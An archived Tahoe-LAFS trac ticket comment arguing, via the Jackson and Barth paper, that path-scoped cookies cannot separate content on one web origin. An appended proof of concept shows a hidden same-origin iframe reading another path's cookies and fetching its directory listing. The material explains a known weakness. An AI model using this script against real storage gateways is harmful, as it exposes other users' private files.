[tahoe-dev] [tahoe-lafs] #615: Can JavaScript loaded from Tahoe access all your content which is loaded from Tahoe?
tahoe-lafs
trac at allmydata.org
Thu Oct 29 16:09:51 PDT 2009
#615: Can JavaScript loaded from Tahoe access all your content which is loaded
from Tahoe?
---------------------------+------------------------------------------------
Reporter: zooko | Type: defect
Status: new | Priority: critical
Milestone: undecided | Component: code-frontend-web
Version: 1.3.0 | Keywords: newcaps security
Launchpad_bug: |
---------------------------+------------------------------------------------
Comment(by davidsarah):
Replying to [comment:1 swillden]:
> Another option is to use cookies. A cookie can also be made specific to
> a host/domain but also to a path. As I understand it (haven't tested),
> Javascript loaded from path A should not have access to cookies set
> specific to path B. If Tahoe were to set per-path cookies on first access
> to a path, then refuse later requests that don't include the right cookie,
> then Javascript from path B would not be able to successfully load URLs on
> path A, because it wouldn't have the cookie.
> There are numerous downsides to the cookie approach ...
Yes. The following paper (which is essential reading for this ticket)
explains why this can't work from a security point of view:
* Beware of Finer-Grained Origins
* Collin Jackson and Adam Barth
* In Web 2.0 Security and Privacy. (W2SP 2008)
* http://crypto.stanford.edu/websec/origins/fgo.pdf
* "Cookie Paths. One classic example of a sub-origin privilege is the
ability to read cookies with "path" attributes. In order to read such a
cookie, the path of the document's URL must extend the path of the cookie.
However, the ability to read these cookies leaks to all documents in the
origin because a same-origin document can inject script into a document
with the appropriate path (even a 404 "not found" document) and read the
cookies. This "vulnerability" has been known for a number of years ...
This vulnerability was "fixed" by declaring the path attribute to be a
convenience feature rather than a security feature."
--
Ticket URL: <http://allmydata.org/trac/tahoe/ticket/615#comment:6>
tahoe-lafs <http://allmydata.org>
secure decentralized file storage grid
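The following is an added illustration of the attack the quoted paper describes, not code from the ticket, the paper, or the Tahoe project. It is a page that an attacker is assumed to have stored under one Tahoe directory ("path B") and that a victim opens through the same web gateway origin. It assumes the hypothetical per-path cookie scheme from comment 1 has already set a cookie scoped to another directory's path ("path A", here the hypothetical placeholder /uri/URI:DIR2:EXAMPLE-A/). The path, cookie name and the 404 filename are all assumptions for the demo.

```html
<!DOCTYPE html>
<!-- Added example, not part of the ticket or the Tahoe code base.
     Served from "path B" on the same origin as the Tahoe web gateway.
     PATH_A is a hypothetical placeholder for a different directory's
     path that the per-path cookie scheme is supposed to protect. -->
<html>
<body>
<script>
// Hypothetical path A. Any URL under it will do, including one that
// returns 404: the browser still creates a same-origin document for
// the error page, and that is all the attacker needs.
const PATH_A = '/uri/URI:DIR2:EXAMPLE-A/';

function readPathACookiesFromPathB() {
  return new Promise((resolve, reject) => {
    const frame = document.createElement('iframe');
    frame.style.display = 'none';
    frame.src = PATH_A + 'this-file-does-not-exist';   // a 404 is fine
    frame.onload = () => {
      try {
        // Same origin, so this page has full DOM access to the frame.
        // document.cookie inside the frame is evaluated against the
        // FRAME's URL path, so the path-A cookie is visible here even
        // though document.cookie in this (path-B) page would not show it.
        const leaked = frame.contentDocument.cookie;

        // Requests issued from the frame's window carry the path-A cookie
        // automatically, so a server check of "request for path A must
        // present the path-A cookie" is satisfied by path-B script.
        frame.contentWindow.fetch(PATH_A, { credentials: 'same-origin' })
          .then(r => r.text())
          .then(body => resolve({ cookie: leaked, body }))
          .catch(reject);
      } catch (e) {
        // Only reached if the frame were cross-origin, which it is not.
        reject(e);
      }
    };
    document.body.appendChild(frame);
  });
}

readPathACookiesFromPathB().then(({ cookie, body }) => {
  console.log('path-A cookies readable from path B:', cookie);
  console.log('start of the path-A listing fetched with them:', body.slice(0, 200));
});
</script>
</body>
</html>
```

Two caveats a practitioner would check: marking the cookie HttpOnly blocks the `document.cookie` read but not the request made from the frame's window, which is the step that actually defeats the server-side check; and refusing to be framed (X-Frame-Options or a CSP frame-ancestors directive) only changes the vector, since a same-origin `window.open` gives the same DOM access. Neither turns the cookie path attribute into an origin boundary, which is the paper's point.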